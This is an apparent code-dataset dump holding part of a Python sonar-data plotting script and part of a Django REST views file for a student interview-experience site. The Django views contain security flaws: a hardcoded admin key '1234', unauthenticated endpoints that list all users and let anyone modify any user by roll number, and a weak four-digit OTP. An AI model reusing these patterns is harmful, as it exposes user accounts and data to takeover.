+ \"dt_6_len: \" + str(len(dt_6)) + \"\\n\"\n + \"dt_7_len: \" + str(len(dt_7)) + \"\\n\"\n )\n duration_0 = ts_0[len(ts_0) - 1] - ts_0[0]\n min_0 = int(duration_0 / (1000 * 60))\n sec_0 = int((duration_0 - (min_0 * 1000 * 60)) / 1000)\n msec_0 = int((duration_0 - (min_0 * 1000 * 60)) % 1000)\n ## print(diff_time_0)\n figure1 = plt.figure(\"Sonar diff timestamp\")\n font = {'family': 'serif',\n 'color': 'blue',\n 'weight': 'normal',\n 'size': 16,\n }\n ax_dt_0 = figure1.add_subplot(4, 2, 1)\n ax_dt_0.plot(dt_0, '-b')\n curves = [\"sonar0\"]\n ax_dt_0.legend(curves, prop={'size':18})\n leg = ax_dt_0.get_legend()\n leg.legendHandles[0].set_color('blue')\n ax_dt_0.text(0.5, 0.5, \"duration: \" + str(min_0) + \"min : \" + str(sec_0) + \"sec : \" + str(msec_0) + \"msec\\n\", horizontalalignment='center', verticalalignment='center', transform=ax_dt_0.transAxes, fontdict=font)\n ax_dt_0.grid(True)\n ax_dt_1 = figure1.add_subplot(4, 2, 2)\n ax_dt_1.plot(dt_1, '-b')\n curves = [\"sonar1\"]\n ax_dt_1.legend(curves, prop={'size':18})\n leg = ax_dt_1.get_legend()\n leg.legendHandles[0].set_color('blue')\n ax_dt_1.grid(True)\n ax_dt_2 = figure1.add_subplot(4, 2, 3)\n ax_dt_2.plot(dt_2, '-b')\n curves = [\"sonar2\"]\n ax_dt_2.legend(curves, prop={'size':18})\n leg = ax_dt_2.get_legend()\n leg.legendHandles[0].set_color('blue')\n ax_dt_2.grid(True)\n ax_dt_3 = figure1.add_subplot(4, 2, 4)\n ax_dt_3.plot(dt_3, '-b')\n curves = [\"sonar3\"]\n ax_dt_3.legend(curves, prop={'size':18})\n leg = ax_dt_3.get_legend()\n leg.legendHandles[0].set_color('blue')\n ax_dt_3.grid(True)\n ax_dt_4 = figure1.add_subplot(4, 2, 5)\n ax_dt_4.plot(dt_4, '-b')\n curves = [\"sonar4\"]\n ax_dt_4.legend(curves, prop={'size':18})\n leg = ax_dt_4.get_legend()\n leg.legendHandles[0].set_color('blue')\n ax_dt_4.grid(True)\n ax_dt_5 = figure1.add_subplot(4, 2, 6)\n ax_dt_5.plot(dt_5, '-b')\n curves = [\"sonar5\"]\n ax_dt_5.legend(curves, prop={'size':18})\n leg = ax_dt_5.get_legend()\n leg.legendHandles[0].set_color('blue')\n ax_dt_5.grid(True)\n ax_dt_6 = figure1.add_subplot(4, 2, 7)\n ax_dt_6.plot(dt_6, '-b')\n curves = [\"sonar6\"]\n ax_dt_6.legend(curves, prop={'size':18})\n leg = 
ax_dt_6.get_legend()\n leg.legendHandles[0].set_color('blue')\n ax_dt_6.grid(True)\n ax_dt_7 = figure1.add_subplot(4, 2, 8)\n ax_dt_7.plot(dt_7, '-b')\n curves = [\"sonar7\"]\n ax_dt_7.legend(curves, prop={'size':18})\n leg = ax_dt_7.get_legend()\n leg.legendHandles[0].set_color('blue')\n ax_dt_7.grid(True)\n # ax_1.text(0, 90, \"duration: \" + str(min_0) + \"min : \" + str(sec_0) + \"sec : \" + str(msec_0) + \"msec\\n\", fontdict=font)\n # ax_1.text(750, 110, \"ID0 - diff_time:\\n min: \" + \"{0:.2f}\".format(np.min(diff_time_0)) + \"ms\\n mean: \" + \"{0:.2f}\".format(np.mean(diff_time_0)) + \"ms\\n max: \" + \"{0:.2f}\".format(np.max(diff_time_0)) + \"ms\\n std dev: \" + \"{0:.2f}\".format(np.std(diff_time_0)), fontdict=font)\n # curves = [\"CHANNEL1 - ID0 diff_time\"]\n # plt.legend(curves, prop={'size':18})\n # leg = ax_1.get_legend()\n # leg.legendHandles[0].set_color('blue')\n # ax_2 = figure1.add_subplot(4, 2, 2)\n # ax_2.plot(diff_time_2, '-g')\n # ax_2.grid(True)\n # # ax_2.text(0, 90, \"duration: \" + str(min) + \"min : \" + str(sec) + \"sec : \" + str(msec) + \"msec\\n\", fontdict=font)\n # ax_2.text(750, 110, \"ID0 - diff_time:\\n min: \" + \"{0:.2f}\".format(np.min(diff_time_2)) + \"ms\\n mean: \" + \"{0:.2f}\".format(np.mean(diff_time_2)) + \"ms\\n max: \" + \"{0:.2f}\".format(np.max(diff_time_2)) + \"ms\", fontdict=font)\n # curves = [\"CHANNEL1 - ID2 diff_time\"]\n # plt.legend(curves, prop={'size':18})\n # leg = ax_2.get_legend()\n # leg.legendHandles[0].set_color('blue')\n # ax_3 = figure1.add_subplot(2, 2, 3)\n # ax_3.plot(diff_time_4, '-r')\n # ax_3.grid(True)\n # # ax_3.text(0, 90, \"duration: \" + str(min) + \"min : \" + str(sec) + \"sec : \" + str(msec) + \"msec\\n\", fontdict=font)\n # ax_3.text(750, 110, \"ID0 - diff_time:\\n min: \" + \"{0:.2f}\".format(np.min(diff_time_4)) + \"ms\\n mean: \" + \"{0:.2f}\".format(np.mean(diff_time_4)) + \"ms\\n max: \" + \"{0:.2f}\".format(np.max(diff_time_4)) + \"ms\\n\", fontdict=font)\n # curves = [\"CHANNEL1 - ID4 diff_time\"]\n # plt.legend(curves, prop={'size':18})\n # leg = ax_3.get_legend()\n # leg.legendHandles[0].set_color('blue')\n # ax_4 = figure1.add_subplot(2, 2, 4)\n # ax_4.plot(diff_time_6, '-m')\n # ax_4.grid(True)\n # print(\"len_Range: \" + str(len(range_0)) + \" len_diff_time: \" + str(len(diff_time_0)))\n # font = {'family': 'serif',\n # 'color': 'blue',\n # 'weight': 'normal',\n # 'size': 16,\n # }\n # # ax_4.text(0, 90, \"duration: \" + str(min) + \"min : \" + str(sec) + \"sec : \" + str(msec) + \"msec\\n\", fontdict=font)\n # ax_4.text(750, 110, \"ID0 - diff_time:\\n min: \" + \"{0:.2f}\".format(np.min(diff_time_6)) + \"ms\\n mean: \" + \"{0:.2f}\".format(np.mean(diff_time_6)) + \"ms\\n max: \" + \"{0:.2f}\".format(np.max(diff_time_6)) + \"ms\\n std dev: \" + \"{0:.2f}\".format(np.std(diff_time_6)), fontdict=font)\n # plt.ylabel('ID0 diff timestamp[milliseconds]', size=10)\n # plt.grid(True)\n figure2 = plt.figure(\"Sonar0/1/2/3 Range\")\n figure2.suptitle(\"Sonar0/1/2/3 Range Curve\\nduration: \" + str(min_0) + \"min : \" + str(sec_0) + \"sec : \" + str(msec_0) + \"msec\", x=0.50, y=0.99, fontsize=24)\n font = {'family': 'serif',\n 'color': 'blue',\n 'weight': 'normal',\n 'size': 16,\n }\n ## ----------------BEGIN 0 -------------------- ##\n ax_ran_ori_0 = figure2.add_subplot(2, 4, 1)\n ax_ran_ori_0.plot(ran_ori_0, '-r')\n curves = [\"sonar0 - origin\"]\n ax_ran_ori_0.legend(curves, prop={'size':18})\n leg = ax_ran_ori_0.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(ran_ori_0):\n 
ax_ran_ori_0.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_0.transAxes, fontdict=font)\n else:\n ax_ran_ori_0.text(0.5, 0.9, \"min: \" + \"{0:.1f}\".format(np.min(ran_ori_0)) + \" mean: \" + \"{0:.1f}\".format(np.mean(ran_ori_0)) + \" max: \" + \"{0:.1f}\".format(np.max(ran_ori_0)), horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_0.transAxes, fontdict=font)\n ax_ran_ori_0.grid(True)\n ## ************** ##\n ax_range_0 = figure2.add_subplot(2, 4, 5)\n ax_range_0.plot(range_0, '-r')\n curves = [\"sonar0 - no 65535\"]\n ax_range_0.legend(curves, prop={'size':18})\n leg = ax_range_0.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(range_0):\n ax_range_0.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_range_0.transAxes, fontdict=font)\n else:\n ax_range_0.text(0.5, 0.9, \"min: \" + \"{0:.1f}\".format(np.min(range_0)) + \" mean: \" + \"{0:.1f}\".format(np.mean(range_0)) + \" max: \" + \"{0:.1f}\".format(np.max(range_0)), horizontalalignment='center', verticalalignment='center', transform=ax_range_0.transAxes, fontdict=font)\n ax_range_0.grid(True)\n ## ----------------END 0 --------------------- ##\n ## ----------------BEGIN 1 -------------------- ##\n ax_ran_ori_1 = figure2.add_subplot(2, 4, 2)\n ax_ran_ori_1.plot(ran_ori_1, '-r')\n curves = [\"sonar1 - origin\"]\n ax_ran_ori_1.legend(curves, prop={'size':18})\n leg = ax_ran_ori_1.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(ran_ori_1):\n ax_ran_ori_1.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_1.transAxes, fontdict=font)\n else:\n ax_ran_ori_1.text(0.5, 0.5, \"min: \" + \"{0:.1f}\".format(np.min(ran_ori_1)) + \" mean: \" + \"{0:.1f}\".format(np.mean(ran_ori_1)) + \" max: \" + \"{0:.1f}\".format(np.max(ran_ori_1)), horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_1.transAxes, fontdict=font)\n ax_ran_ori_1.grid(True)\n ## ************** ##\n ax_range_1 = figure2.add_subplot(2, 4, 6)\n ax_range_1.plot(range_1, '-r')\n curves = [\"sonar1 - no 65535\"]\n ax_range_1.legend(curves, prop={'size':18})\n leg = ax_range_1.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(range_1):\n ax_range_1.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_range_1.transAxes, fontdict=font)\n else:\n ax_range_1.text(0.5, 0.5, \"min: \" + \"{0:.1f}\".format(np.min(range_1)) + \" mean: \" + \"{0:.1f}\".format(np.mean(range_1)) + \" max: \" + \"{0:.1f}\".format(np.max(range_1)), horizontalalignment='center', verticalalignment='center', transform=ax_range_1.transAxes, fontdict=font)\n ax_range_1.grid(True)\n ## ----------------END 1 --------------------- ##\n ## ----------------BEGIN 2 --------------------- ##\n ax_ran_ori_2 = figure2.add_subplot(2, 4, 3)\n ax_ran_ori_2.plot(ran_ori_2, '-r')\n curves = [\"sonar2 - origin\"]\n ax_ran_ori_2.legend(curves, prop={'size':18})\n leg = ax_ran_ori_2.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(ran_ori_2):\n ax_ran_ori_2.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_2.transAxes, fontdict=font)\n else:\n ax_ran_ori_2.text(0.5, 0.9, \"min: \" + \"{0:.1f}\".format(np.min(ran_ori_2)) + \" mean: \" + \"{0:.1f}\".format(np.mean(ran_ori_2)) + \" max: \" + \"{0:.1f}\".format(np.max(ran_ori_2)), 
horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_2.transAxes, fontdict=font)\n ax_ran_ori_2.grid(True)\n ## ************** ##\n ax_range_2 = figure2.add_subplot(2, 4, 7)\n ax_range_2.plot(range_2, '-r')\n curves = [\"sonar2 - no 65535\"]\n ax_range_2.legend(curves, prop={'size':18})\n leg = ax_range_2.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(range_2):\n ax_range_2.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_range_2.transAxes, fontdict=font)\n else:\n ax_range_2.text(0.5, 0.9, \"min: \" + \"{0:.1f}\".format(np.min(range_2)) + \" mean: \" + \"{0:.1f}\".format(np.mean(range_2)) + \" max: \" + \"{0:.1f}\".format(np.max(range_2)), horizontalalignment='center', verticalalignment='center', transform=ax_range_2.transAxes, fontdict=font)\n ax_range_2.grid(True)\n ## ----------------END 2 --------------------- ##\n ## ----------------BEGIN 3 --------------------- ##\n ax_ran_ori_3 = figure2.add_subplot(2, 4, 4)\n ax_ran_ori_3.plot(ran_ori_3, '-r')\n curves = [\"sonar3 - origin\"]\n ax_ran_ori_3.legend(curves, prop={'size':18})\n leg = ax_ran_ori_3.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(ran_ori_3):\n ax_ran_ori_3.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_3.transAxes, fontdict=font)\n else:\n ax_ran_ori_3.text(0.5, 0.5, \"min: \" + \"{0:.1f}\".format(np.min(ran_ori_3)) + \" mean: \" + \"{0:.1f}\".format(np.mean(ran_ori_3)) + \" max: \" + \"{0:.1f}\".format(np.max(ran_ori_3)), horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_3.transAxes, fontdict=font)\n ax_ran_ori_3.grid(True)\n ## ************** ##\n ax_range_3 = figure2.add_subplot(2, 4, 8)\n ax_range_3.plot(range_3, '-r')\n curves = [\"sonar3 - no 65535\"]\n ax_range_3.legend(curves, prop={'size':18})\n leg = ax_range_3.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(range_3):\n ax_range_3.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_range_3.transAxes, fontdict=font)\n else:\n ax_range_3.text(0.5, 0.5, \"min: \" + \"{0:.1f}\".format(np.min(range_3)) + \" mean: \" + \"{0:.1f}\".format(np.mean(range_3)) + \" max: \" + \"{0:.1f}\".format(np.max(range_3)), horizontalalignment='center', verticalalignment='center', transform=ax_range_3.transAxes, fontdict=font)\n ax_range_3.grid(True)\n ## ----------------END 3 --------------------- ##\n ## =============================================================================================================================== ##\n figure3 = plt.figure(\"Sonar4/5/6/7 Range\")\n figure3.suptitle(\"Sonar4/5/6/7 Range Curve\\nduration: \" + str(min_0) + \"min : \" + str(sec_0) + \"sec : \" + str(msec_0) + \"msec\", x=0.50, y=0.99, fontsize=24)\n font = {'family': 'serif',\n 'color': 'blue',\n 'weight': 'normal',\n 'size': 16,\n }\n ## ----------------BEGIN 4 -------------------- ##\n ax_ran_ori_4 = figure3.add_subplot(2, 4, 1)\n ax_ran_ori_4.plot(ran_ori_4, '-r')\n curves = [\"sonar4 - origin\"]\n ax_ran_ori_4.legend(curves, prop={'size':18})\n leg = ax_ran_ori_4.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(ran_ori_4):\n ax_ran_ori_4.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_4.transAxes, fontdict=font)\n else:\n ax_ran_ori_4.text(0.5, 0.9, \"min: \" + \"{0:.1f}\".format(np.min(ran_ori_4)) + \" mean: \" + 
\"{0:.1f}\".format(np.mean(ran_ori_4)) + \" max: \" + \"{0:.1f}\".format(np.max(ran_ori_4)), horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_4.transAxes, fontdict=font)\n ax_ran_ori_4.grid(True)\n ## ************** ##\n ax_range_4 = figure3.add_subplot(2, 4, 5)\n ax_range_4.plot(range_4, '-r')\n curves = [\"sonar4 - no 65535\"]\n ax_range_4.legend(curves, prop={'size':18})\n leg = ax_range_4.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(range_4):\n ax_range_4.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_range_4.transAxes, fontdict=font)\n else:\n ax_range_4.text(0.5, 0.9, \"min: \" + \"{0:.1f}\".format(np.min(range_4)) + \" mean: \" + \"{0:.1f}\".format(np.mean(range_4)) + \" max: \" + \"{0:.1f}\".format(np.max(range_4)), horizontalalignment='center', verticalalignment='center', transform=ax_range_4.transAxes, fontdict=font)\n ax_range_4.grid(True)\n ## ----------------END 4 --------------------- ##\n ## ----------------BEGIN 5 -------------------- ##\n ax_ran_ori_5 = figure3.add_subplot(2, 4, 2)\n ax_ran_ori_5.plot(ran_ori_5, '-r')\n curves = [\"sonar5 - origin\"]\n ax_ran_ori_5.legend(curves, prop={'size':18})\n leg = ax_ran_ori_5.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(ran_ori_5):\n ax_ran_ori_5.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_5.transAxes, fontdict=font)\n else:\n ax_ran_ori_5.text(0.5, 0.1, \"min: \" + \"{0:.1f}\".format(np.min(ran_ori_5)) + \" mean: \" + \"{0:.1f}\".format(np.mean(ran_ori_5)) + \" max: \" + \"{0:.1f}\".format(np.max(ran_ori_5)), horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_5.transAxes, fontdict=font)\n ax_ran_ori_5.grid(True)\n ## ************** ##\n ax_range_5 = figure3.add_subplot(2, 4, 6)\n ax_range_5.plot(range_5, '-r')\n curves = [\"sonar5 - no 65535\"]\n ax_range_5.legend(curves, prop={'size':18})\n leg = ax_range_5.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(range_5):\n ax_range_5.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_range_5.transAxes, fontdict=font)\n else:\n ax_range_5.text(0.5, 0.1, \"min: \" + \"{0:.1f}\".format(np.min(range_5)) + \" mean: \" + \"{0:.1f}\".format(np.mean(range_5)) + \" max: \" + \"{0:.1f}\".format(np.max(range_5)), horizontalalignment='center', verticalalignment='center', transform=ax_range_5.transAxes, fontdict=font)\n ax_range_5.grid(True)\n ## ----------------END 5 --------------------- ##\n ## ----------------BEGIN 6 -------------------- ##\n ax_ran_ori_6 = figure3.add_subplot(2, 4, 3)\n ax_ran_ori_6.plot(ran_ori_6, '-r')\n curves = [\"sonar6 - origin\"]\n ax_ran_ori_6.legend(curves, prop={'size':18})\n leg = ax_ran_ori_6.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(ran_ori_6):\n ax_ran_ori_6.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_6.transAxes, fontdict=font)\n else:\n ax_ran_ori_6.text(0.5, 0.9, \"min: \" + \"{0:.1f}\".format(np.min(ran_ori_6)) + \" mean: \" + \"{0:.1f}\".format(np.mean(ran_ori_6)) + \" max: \" + \"{0:.1f}\".format(np.max(ran_ori_6)), horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_6.transAxes, fontdict=font)\n ax_ran_ori_6.grid(True)\n ## ************** ##\n ax_range_6 = figure3.add_subplot(2, 4, 7)\n ax_range_6.plot(range_6, '-r')\n curves = [\"sonar6 - 
no 65535\"]\n ax_range_6.legend(curves, prop={'size':18})\n leg = ax_range_6.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(range_6):\n ax_range_6.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_range_6.transAxes, fontdict=font)\n else:\n ax_range_6.text(0.5, 0.9, \"min: \" + \"{0:.1f}\".format(np.min(range_6)) + \" mean: \" + \"{0:.1f}\".format(np.mean(range_6)) + \" max: \" + \"{0:.1f}\".format(np.max(range_6)), horizontalalignment='center', verticalalignment='center', transform=ax_range_6.transAxes, fontdict=font)\n ax_range_6.grid(True)\n ## ----------------END 6 --------------------- ##\n ## ----------------BEGIN 7 -------------------- ##\n ax_ran_ori_7 = figure3.add_subplot(2, 4, 4)\n ax_ran_ori_7.plot(ran_ori_7, '-r')\n curves = [\"sonar7 - origin\"]\n ax_ran_ori_7.legend(curves, prop={'size':18})\n leg = ax_ran_ori_7.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(ran_ori_7):\n ax_ran_ori_7.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_7.transAxes, fontdict=font)\n else:\n ax_ran_ori_7.text(0.5, 0.5, \"min: \" + \"{0:.1f}\".format(np.min(ran_ori_7)) + \" mean: \" + \"{0:.1f}\".format(np.mean(ran_ori_7)) + \" max: \" + \"{0:.1f}\".format(np.max(ran_ori_7)), horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_7.transAxes, fontdict=font)\n ax_ran_ori_7.grid(True)\n ## ************** ##\n ax_range_7 = figure3.add_subplot(2, 4, 8)\n ax_range_7.plot(range_7, '-r')\n curves = [\"sonar7 - no 65535\"]\n ax_range_7.legend(curves, prop={'size':18})\n leg = ax_range_7.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(range_7):\n ax_range_7.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_range_7.transAxes, fontdict=font)\n else:\n ax_range_7.text(0.5, 0.5, \"min: \" + \"{0:.1f}\".format(np.min(range_7)) + \" mean: \" + \"{0:.1f}\".format(np.mean(range_7)) + \" max: \" + \"{0:.1f}\".format(np.max(range_7)), horizontalalignment='center', verticalalignment='center', transform=ax_range_7.transAxes, fontdict=font)\n ax_range_7.grid(True)\n ## ----------------END 7 --------------------- ##\n # ax_3.text(0, 90, \"duration: \" + str(min) + \"min : \" + str(sec) + \"sec : \" + str(msec) + \"msec\\n\", fontdict=font)\n # ax_3.text(750, 110, \"ID0 - diff_time:\\n min: \" + \"{0:.1f}\".format(np.min(diff_time_0)) + \"ms\\n mean: \" + \"{0:.2f}\".format(np.mean(diff_time_0)) + \"ms\\n max: \" + \"{0:.2f}\".format(np.max(diff_time_0)) + \"ms\\n std dev: \" + \"{0:.2f}\".format(np.std(diff_time_0)), fontdict=font)\n # curves = [\"CHANNEL1 - ID4 diff_time\"]\n # plt.legend(curves, prop={'size':18})\n # leg = ax_3.get_legend()\n # leg.legendHandles[0].set_color('blue')\n #plt.text(0, 90, \"duration: \" + str(min) + \"min : \" + str(sec) + \"sec : \" + str(msec) + \"msec\\n\", fontdict=font)\n #plt.text(750, 110, \"ID0 - diff_time:\\n min: \" + \"{0:.2f}\".format(np.min(diff_time_0)) + \"ms\\n mean: \" + \"{0:.2f}\".format(np.mean(diff_time_0)) + \"ms\\n max: \" + \"{0:.2f}\".format(np.max(diff_time_0)) + \"ms\\n std dev: \" + \"{0:.2f}\".format(np.std(diff_time_0)), fontdict=font)\n #plt.ylabel('ID0 diff timestamp[milliseconds]', size=10)\n ## curves = [\"CHANNEL0 - CAN diff time\"]\n ## plt.legend(curves, prop={'size':18})\n ## ax = plt.gca()\n ## leg = ax.get_legend()\n ## leg.legendHandles[0].set_color('blue')\n ## diff_linux_time = 
np.diff(linux_timestamp_0)\n ## plt.plot(diff_linux_time, '-r')\n ## font = {'family': 'serif',\n ## 'color': 'red',\n ## 'weight': 'normal',\n ## 'size': 14,\n ## }\n ## plt.text(110, 6000, \"ID1 - diff_linux_time:\\n min: \" + \"{0:.4f}\".format(np.min(diff_linux_time)) + \"ms\\n mean: \" + \"{0:.4f}\".format(np.mean(diff_linux_time)) + \"ms\\n max: \" + \"{0:.4f}\".format(np.max(diff_linux_time)) + \"ms\\n std dev: \" + \"{0:.4f}\".format(np.std(diff_linux_time)), fontdict=font)\n ## plt.ylabel('diff timestamp[milliseconds]', size=10)\n ## curves = [\"CAN time\", \"Linux time\"]\n ## plt.legend(curves, prop={'size':10})\n ## ax = plt.gca()\n ## leg = ax.get_legend()\n ## leg.legendHandles[0].set_color('blue')\n ## leg.legendHandles[1].set_color('red')\n ## plt.grid(True)\n plt.show()\n else:\n print(\"Usage: \" + sys.argv[0] + \" radar.txt\")\n","sub_path":"scripts/sonar/sonar_RANGE_compare_origin_filtered.py","file_name":"sonar_RANGE_compare_origin_filtered.py","file_ext":"py","file_size_in_byte":35641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"16644893","text":"from rest_framework.parsers import FileUploadParser\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework import permissions, status\nfrom django.http import Http404\nfrom django.core.mail import send_mail\nimport json\nimport random as r\n\nfrom .models import File,Interview, User, CommentsPYQ, CommentsExp, emailVerify\nfrom .serializers import FileSerializer, interviewSerializer, CommentsPYQSerializer, \\\n CommentsExpSerializer, emailSerializer, UserSerializer, UserSerializerWithToken\n\nimport logging\nlogging.basicConfig(filename='pyq.log',format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO)\n\n\"\"\"\nemail verify\n\"\"\"\n@permission_classes([permissions.AllowAny])\ndef otpgen():\n otp = \"\"\n for i in range(4):\n otp += str(r.randint(1, 9))\n return otp\n\n\nclass confirmEmailID(APIView):\n permission_classes = (permissions.AllowAny,)\n\n def post(self, request, *args, **kwargs):\n data=request.data\n otp=otpgen()\n data[\"otp\"]=int(otp)\n emailVerify = emailSerializer(data=data)\n send_mail('SCP Demo', 'Hey Welcome! 
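The sonar record above keeps eight parallel copies of every variable (range_0 ... range_7, timestamp_0 ... timestamp_7) plus a long if/elif ladder. One dict keyed by sensor id expresses the same bookkeeping once; a sketch of the idea, simplified to the fields that matter:

sensors = {aa: {"ts": [], "rng": [], "last_ts": -1.0, "cnt_ffff": 0}
           for aa in range(8)}

def record(aa, timestamp_val, range_val):
    s = sensors[aa]
    if s["last_ts"] >= 0.0 and timestamp_val == s["last_ts"]:
        return                              # skip duplicate timestamps
    s["last_ts"] = timestamp_val
    s["ts"].append(timestamp_val)
    if 0 <= range_val < 60000:
        s["rng"].append(0.001 * range_val)  # mm -> m, as in the record
    else:
        s["cnt_ffff"] += 1                  # count invalid (0xFFFF) readings

record(0, 12.5, 1500)
print(sensors[0])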
Your One Time Password is ' + otp, 'iiitbemailverify@gmail.com',\n [request.data[\"email\"]], fail_silently=False, )\n if emailVerify.is_valid():\n emailVerify.save()\n return Response(emailVerify.data, status=status.HTTP_201_CREATED)\n else:\n return Response(emailSerializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get_object(self, otp):\n try:\n return emailVerify.objects.get(otp=otp)\n except emailVerify.DoesNotExist:\n raise Http404\n\n def get(self, request, otp, format=None):\n emailVerify = self.get_object(otp)\n serializer = emailSerializer(emailVerify)\n return Response(serializer.data)\n\nclass verifyEmailID(APIView):\n permission_classes = (permissions.AllowAny,)\n def get_object(self, otp):\n try:\n return emailVerify.objects.get(otp=otp)\n except emailVerify.DoesNotExist:\n raise Http404\n\n\n def post(self, request, *args, **kwargs):\n emailVerify = self.get_object(request.data[\"otp\"])\n serializer = emailSerializer(emailVerify, data=request.data,\n partial=True)\n if serializer.is_valid():\n emailVerify.delete()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n emailVerify.delete()\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\"\"\"\nEND - email verify\n\"\"\"\n\n\"\"\"\nUSER VIEWS\n\"\"\"\n\n@api_view(['GET'])\ndef current_user(request):\n \"\"\"\n Determine the current user by their token, and return their data\n \"\"\"\n serializer = UserSerializer(request.user)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef adminVerify(request):\n \"\"\"\n ADMIN KEY CHECK\n \"\"\"\n serializer = UserSerializer(request.user)\n role=serializer.data.get('role')\n if role=='admin' and request.GET.get('adminkey')==\"1234\":\n return Response(serializer.data)\n raise Http404\n \nclass UserList(APIView):\n \"\"\"\n Create a new user.\n \"\"\"\n\n permission_classes = (permissions.AllowAny,)\n\n def post(self, request, format=None):\n serializer = UserSerializerWithToken(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n \"\"\"\n get the details of all the users\n \"\"\"\n\n def get(self, request):\n \n user = User.objects.all()\n serializer = UserSerializer(user, many=True)\n return Response(serializer.data)\n\nclass loginDataId(APIView):\n \"\"\"\n Retrieve, update or delete a snippet instance based on roll number\n \"\"\"\n permission_classes = (permissions.AllowAny,)\n def get_object(self, rollNumber):\n try:\n return User.objects.get(rollNumber=rollNumber)\n except User.DoesNotExist:\n raise Http404\n\n def get(self, request, rollNumber, format=None):\n user = self.get_object(rollNumber)\n serializer = UserSerializer(user)\n return Response(serializer.data)\n\n def patch(self, request, rollNumber, format=None):\n user = self.get_object(rollNumber)\n serializer = UserSerializerWithToken(user, data=request.data, partial=True)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\"\"\"\nEND OF USER VIEWS\n\"\"\"\n\nclass interviewData(APIView):\n def get(self, request):\n logging.info('Trying: GET: Interview Exp Data')\n product1 = Interview.objects.filter(verified=True)\n serializer = interviewSerializer(product1, many=True)\n logging.info(\"Successful: GET: Interview Exp Data\")\n return Response(serializer.data)\n\n def post(self, request, *args, **kwargs):\n 
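Editor's note: `otpgen` in the views.py record draws four digits from 1-9 with `random.randint`, which is not cryptographically strong. A sketch of the same idea on the stdlib `secrets` module (assumption: a 4-digit numeric OTP is still what is wanted; unlike the record's version this one can include 0).

    import secrets

    def otpgen(length=4):
        # secrets uses a CSPRNG, so codes are not predictable
        # from previously observed outputs, unlike random.randint.
        return ''.join(str(secrets.randbelow(10)) for _ in range(length))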
logging.info('Trying: POST: Interview Exp Data')\n\n user=User.objects.get(rollNumber=request.user)\n serializer = UserSerializer(user)\n name=serializer.data.get('rollNumber')+\"_\"+serializer.data.get('username')\n request.data['name']=name\n\n file_serializer = interviewSerializer(data=request.data)\n if file_serializer.is_valid():\n file_serializer.save()\n logging.info(\"Successful: POST: Interview Exp Data, status %s\" % status.HTTP_201_CREATED)\n return Response(file_serializer.data, status=status.HTTP_201_CREATED)\n else:\n logging.warning(\"Bad Request: POST: Interview Exp Data, status %s\" % status.HTTP_400_BAD_REQUEST)\n return Response(file_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass interviewDataId(APIView):\n \"\"\"\n Retrieve, update or delete a snippet instance.\n \"\"\"\n def get_object(self, id):\n logging.info('Trying: GET: Interview Exp by id %s' % id)\n try:\n return Interview.objects.get(id=id)\n except Interview.DoesNotExist:\n raise 